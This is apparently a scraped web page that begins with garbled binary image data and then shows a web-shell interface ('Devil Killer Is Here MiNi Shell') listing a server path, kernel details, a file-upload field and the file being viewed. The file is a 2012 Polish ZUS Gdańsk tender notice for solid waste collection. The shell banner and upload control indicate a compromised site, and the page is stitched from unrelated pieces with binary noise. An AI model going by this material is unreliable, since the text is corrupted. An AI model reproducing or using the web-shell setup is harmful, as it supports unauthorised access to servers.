JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120927/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120927/206459-N-2012.html

<p class="kh_header"><b>Gdańsk: Wywóz nieczystości stałych w jednostkach organizacyjnych Oddziału ZUS 
w Gdańsku</b><br>
<b>Numer ogłoszenia: 206459 - 2012; data zamieszczenia: 27.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Gdańsku , ul. Chmielna 27/33, 80-748 Gdańsk, woj. pomorskie, tel. 58 3078200, faks 58 3018459.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Instytucja ubezpieczenia społecznego i zdrowotnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wywóz nieczystości stałych w jednostkach organizacyjnych Oddziału ZUS 
w Gdańsku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wywóz nieczystości stałych w jednostkach organizacyjnych Oddziału ZUS w Gdańsku, odpowiednio dla danej części zamówienia:
1) część I - Oddział ZUS i jednostki organizacyjne w Gdańsku, tj.:
- ZUS Oddział w Gdańsku, ul. Chmielna 27/33, 
- jednostka organizacyjna w Gdańsku, ul. Marynarki Polskiej 146 i 146A,
- Inspektorat ZUS Gdańsk Śródmieście, ul. Chlebnicka 3/8,
- Inspektorat ZUS Gdańsk Wrzeszcz, ul. Tuwima 9,
- jednostka organizacyjna w Gdańsku, ul. Sobótki 18,
2) część II - Inspektorat ZUS w Sopocie, Al. Niepodległości 796, 
3) część III - Inspektorat ZUS w Gdyni, ul. Władysława IV 24,
4) część IV - Inspektorat ZUS w Pucku, ul. Orzeszkowej 3,
5) część V - Inspektorat ZUS w Pruszczu Gdańskim, ul. Wita Stwosza 7,
6) część VI - Inspektorat ZUS w Wejherowie, ul. Sobieskiego 294, 
7) część VII - Inspektorat ZUS w Kartuzach, ul. Ceynowy 5,
8) część VIII - Inspektorat ZUS w Kościerzynie, ul. 3-go Maja 9,
9) część IX - Inspektorat ZUS w Kwidzynie, ul. Piłsudskiego 29A,
10) część X - Inspektorat ZUS w Tczewie, ul. Jagiellońska 55.
Zamawiający dopuszcza złożenie oferty na dowolną ilość części.
Wartość zamówienia jest mniejsza niż kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8 ustawy Prawo zamówień publicznych.
Termin wykonania zamówienia: przedmiot zamówienia należy realizować odpowiednio: 
1) część I - Oddział ZUS i jednostki organizacyjne w Gdańsku, tj.:
- ZUS Oddział w Gdańsku, ul. Chmielna 27/33, 
- jednostka organizacyjna w Gdańsku, ul. Marynarki Polskiej 146 i 146A,
- Inspektorat ZUS Gdańsk Śródmieście, ul. Chlebnicka 3/8,
- Inspektorat ZUS Gdańsk Wrzeszcz, ul. Tuwima 9, 
od dnia 01.02.2013 roku do dnia 31.03.2014 roku,
- jednostka organizacyjna w Gdańsku, ul. Sobótki 18, 
od dnia 01.04.2013 roku do dnia 31.03.2014 roku,
2) część II - Inspektorat ZUS w Sopocie, Al. Niepodległości 796, od dnia 01.02.2013 roku do dnia 31.03.2014 roku,
3) część III - Inspektorat ZUS w Gdyni, ul. Władysława IV 24, od dnia 01.12.2012 roku do dnia 31.03.2014 roku,
4) część IV - Inspektorat ZUS w Pucku, ul. Orzeszkowej 3, od dnia 01.02.2013 roku do dnia 31.03.2014 roku,
5) część V - Inspektorat ZUS w Pruszczu Gdańskim, ul. Wita Stwosza 7, od dnia 01.02.2013 roku do dnia 31.03.2014 roku,
6) część VI - Inspektorat ZUS w Wejherowie, ul. Sobieskiego 294, od dnia 01.01.2013 roku do dnia 31.03.2014 roku,
7) część VII - Inspektorat ZUS w Kartuzach, ul. Ceynowy 5, od dnia 01.04.2013 roku do dnia 31.03.2014 roku,
8) część VIII - Inspektorat ZUS w Kościerzynie, ul. 3-go Maja 9, od dnia 01.02.2013 roku do dnia 31.03.2014 roku,
9) część IX - Inspektorat ZUS w Kwidzynie, ul. Piłsudskiego 29A, od dnia 01.01.2013 roku do dnia 31.03.2014 roku,
10) część X - Inspektorat ZUS w Tczewie, ul. Jagiellońska 55, od dnia 01.04.2013 roku do dnia 31.03.2014 roku.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w niniejszym postępowaniu nie wymaga wniesienia przez Wykonawcę wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia.
Ocena spełnienia odbędzie się na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia.
2. Wykonawca złoży aktualne zezwolenie (wraz ze wszystkimi zmianami) na prowadzenie działalności w zakresie transportu odpadów (dot. odpadów z grupy 20 katalogu odpadów określonych w rozporządzeniu Ministra Środowiska z dnia 27.09.2001r. w sprawie katalogu odpadów), o którym mowa w art. 28 ust. 1 ustawy z dnia 27.04.2001r. o odpadach (tekst jedn. Dz. U. z 2010 nr 185 poz. 1243 z późn. zm.) na obszarze, na którym mają swoje siedziby, odpowiednio dla danej części zamówienia:
1) Oddział ZUS i jednostki organizacyjne w Gdańsku, tj.:
- ZUS Oddział w Gdańsku, ul. Chmielna 27/33, 
- jednostka organizacyjna w Gdańsku, ul. Marynarki Polskiej 146 i 146A,
- Inspektorat ZUS Gdańsk Śródmieście, Chlebnicka 3/8,
- Inspektorat ZUS Gdańsk Wrzeszcz, ul. Tuwima 9, 
- jednostka organizacyjna w Gdańsku, ul. Sobótki 18,
2) Inspektorat ZUS w Sopocie,
3) Inspektorat ZUS w Gdyni,
4) Inspektorat ZUS w Pucku, 
5) Inspektorat ZUS w Pruszczu Gdańskim,
6) Inspektorat ZUS w Wejherowie,
7) Inspektorat ZUS w Kartuzach, 
8) Inspektorat ZUS w Kościerzynie,
9) Inspektorat ZUS w Kwidzynie,
10) Inspektorat ZUS w Tczewie.
Ocena spełnienia tego warunku odbędzie się na podstawie analizy treści aktualnego zezwolenia (wraz ze wszystkimi zmianami) na prowadzenie działalności w zakresie transportu odpadów (dot. odpadów z grupy 20 katalogu odpadów określonych w rozporządzeniu Ministra Środowiska z dnia 27.09.2001r. w sprawie katalogu odpadów), o którym mowa w art. 28 ust. 1 ustawy z dnia 27.04.2001r. o odpadach (tekst jedn. Dz. U. z 2010 nr 185 poz. 1243 z późn. zm.) na obszarze, na którym mają swoje siedziby, odpowiednio dla danej części zamówienia:
1) Oddział ZUS i jednostki organizacyjne w Gdańsku, tj.:
- ZUS Oddział w Gdańsku, ul. Chmielna 27/33, 
- jednostka organizacyjna w Gdańsku, ul. Marynarki Polskiej 146 i 146A,
- Inspektorat ZUS Gdańsk Śródmieście, Chlebnicka 3/8,
- Inspektorat ZUS Gdańsk Wrzeszcz, ul. Tuwima 9, 
- jednostka organizacyjna w Gdańsku, ul. Sobótki 18,
2) Inspektorat ZUS w Sopocie,
3) Inspektorat ZUS w Gdyni,
4) Inspektorat ZUS w Pucku, 
5) Inspektorat ZUS w Pruszczu Gdańskim,
6) Inspektorat ZUS w Wejherowie,
7) Inspektorat ZUS w Kartuzach, 
8) Inspektorat ZUS w Kościerzynie,
9) Inspektorat ZUS w Kwidzynie,
10) Inspektorat ZUS w Tczewie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia.
Ocena spełnienia odbędzie się na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia.
Ocena spełnienia odbędzie się na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia.
Ocena spełnienia odbędzie się na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia.
Ocena spełnienia odbędzie się na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony Formularz Oferty.
2. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1., zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. W przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, pisemne zobowiązanie tych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
4. W przypadku osoby (osób) działającej w imieniu Wykonawcy w oparciu o odrębnie udzielone pełnomocnictwo, w ofercie należy złożyć: oryginał dokumentu potwierdzającego udzielenie tego pełnomocnictwa lub jego notarialnie potwierdzoną kopię. 
Wykonawcy, którzy wspólnie będą ubiegać się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego zgodnie z art. 23 ustawy Prawo zamówień publicznych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonywania istotnych zmian postanowień zawartej umowy wynikających z następujących okoliczności:
1) zmiana wysokości opłat za korzystanie ze środowiska, za składowanie odpadów oraz innych opłat, wynikających ze zmian stawek określonych w przepisach o ochronie środowiska,
2) zmiana bezwzględnych przepisów prawa, na podstawie których, realizowana jest umowa,
3) wystąpienie siły wyższej,
4) zmiany organizacyjne w ZUS,
5) zmiany korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zus.pl/zampub<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Ubezpieczeń Społecznych Oddział w Gdańsku,
80-748 Gdańsk, ul. Chmielna 27/33, pokój nr 25, tel. 58 307 82 59.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.10.2012 godzina 08:00, miejsce: Zakład Ubezpieczeń Społecznych, Oddział w Gdańsku, 
80-748 Gdańsk, ul. Chmielna 27/33, pokój nr 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający informuje, że nie zamierza zawierać umowy ramowej.
Zamawiający informuje, że nie zamierza ustanowić dynamicznego systemu zakupów.
Zamawiający nie przewiduje oraz nie określa wymagań, o których mowa w art. 29 ust. 4 ustawy Prawo zamówień publicznych.
Numer postępowania nadany przez Zamawiającego: 10 00 00/370/22/2012/ZAP.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Oddział ZUS i jednostki organizacyjne w Gdańsku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wywóz nieczystości stałych z następujących posesji:
- ZUS Oddział w Gdańsku, ul. Chmielna 27/33
Zakres usługi:
1) zapewnienie sprawnego i terminowego wywozu nieczystości stałych z posesji Oddziału ZUS w Gdańsku - 5 razy w tygodniu (od poniedziałku do piątku),
2) najem pojemników na nieczystości stałe suche w ilości - 2 sztuki o pojemności 1,1 m3 każdy,
3) najem pojemników na nieczystości stałe mokre w ilości - 1 sztuka o pojemności 1,1 m3.
Przedmiot zamówienia należy realizować od dnia 01.02.2013 roku do dnia 31.03.2014 roku.
- Jednostka organizacyjna w Gdańsku, ul. Marynarki Polskiej 146 i 146A
Zakres usługi:
1) zapewnienie sprawnego i terminowego wywozu nieczystości stałych z posesji jednostki organizacyjnej w Gdańsku, ul. Marynarki Polskiej 146 i 146A - 1 raz w tygodniu (piątek),
2) najem pojemników na nieczystości stałe suche w ilości - 1 sztuka o pojemności 1,1 m3 ,
3) najem pojemników na nieczystości stałe mokre w ilości - 1 sztuka o pojemności 1,1 m3.
Przedmiot zamówienia należy realizować od dnia 01.02.2013 roku do dnia 31.03.2014 roku.
- Inspektorat ZUS Gdańsk Śródmieście, ul. Chlebnicka 3/8
Zakres usługi:
1) zapewnienie sprawnego i terminowego wywozu nieczystości stałych z posesji Inspektoratu ZUS Gdańsk Śródmieście - 2 razy w tygodniu (poniedziałek i czwartek),
2) najem pojemników na nieczystości stałe suche w ilości - 1 sztuka o pojemności 1,1 m3,
3) najem pojemników na nieczystości stałe mokre w ilości - 1 sztuka o pojemności 1,1 m3.
Przedmiot zamówienia należy realizować od dnia 01.02.2013 roku do dnia 31.03.2014 roku.
- Inspektorat ZUS Gdańsk Wrzeszcz, ul. Tuwima 9 
Zakres usługi:
1) zapewnienie sprawnego i terminowego wywozu nieczystości stałych z posesji Inspektoratu ZUS Gdańsk Wrzeszcz - 2 razy w tygodniu (wtorek i piątek),
2) najem pojemników na nieczystości stałe suche w ilości - 2 sztuki o pojemności 1,1 m3 każdy,
3) najem pojemników na nieczystości stałe mokre w ilości - 1 sztuka o pojemności 1,1 m3.
Przedmiot zamówienia należy realizować od dnia 01.02.2013 roku do dnia 31.03.2014 roku.
- Jednostka organizacyjna w Gdańsku, ul. Sobótki 18
Zakres usługi:
1) zapewnienie sprawnego i terminowego wywozu nieczystości stałych z posesji jednostki organizacyjnej w Gdańsku, ul. Sobótki 18 - 1 raz w tygodniu (wtorek),
2) najem pojemników na nieczystości w ilości - 1 sztuka o pojemności 1,1 m3 .
Przedmiot zamówienia należy realizować od dnia 01.04.2013 roku do dnia 31.03.2014 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Inspektorat ZUS w Sopocie, Al. Niepodległości 796.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wywóz nieczystości stałych z posesji Inspektoratu ZUS w Sopocie, Al. Niepodległości 796.
Zakres usługi:
1) zapewnienie sprawnego i terminowego wywozu nieczystości stałych z posesji Inspektoratu ZUS w Sopocie - 2 razy w tygodniu (wtorek i piątek),
2) najem pojemników na nieczystości stałe suche w ilości - 1 sztuka o pojemności 1,1 m3,
3) najem pojemników na nieczystości stałe mokre w ilości - 1 sztuka o pojemności 1,1 m3.
Przedmiot zamówienia należy realizować od dnia 01.02.2013 roku do dnia 31.03.2014 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Inspektorat ZUS w Gdyni, ul. Władysława IV 24.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wywóz nieczystości stałych z posesji Inspektoratu ZUS w Gdyni, ul. Władysława IV 24.
Zakres usługi:
1) zapewnienie sprawnego i terminowego wywozu nieczystości stałych z posesji Inspektoratu ZUS w Gdyni - 2 razy w tygodniu (poniedziałek i czwartek),
2) najem pojemników na nieczystości stałe suche w ilości - 1 sztuka o pojemności 1,1 m3,
3) najem pojemników na nieczystości stałe mokre w ilości - 1 sztuka o pojemności 1,1 m3.
Przedmiot zamówienia należy realizować od dnia 01.12.2012 roku do dnia 31.03.2014 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.51.32.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Inspektorat ZUS w Pucku, ul. Orzeszkowej 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wywóz nieczystości stałych z posesji Inspektoratu ZUS w Pucku, ul. Orzeszkowej 3.
Zakres usługi:
1) zapewnienie sprawnego i terminowego wywozu nieczystości stałych z posesji Inspektoratu ZUS w Pucku - 1 raz w tygodniu (wtorek),
2) najem pojemników na nieczystości stałe suche w ilości - 2 sztuki o pojemności 0,11 m3 każdy,
3) najem pojemników na nieczystości stałe mokre w ilości - 2 sztuki o pojemności 0,11 m3 każdy.
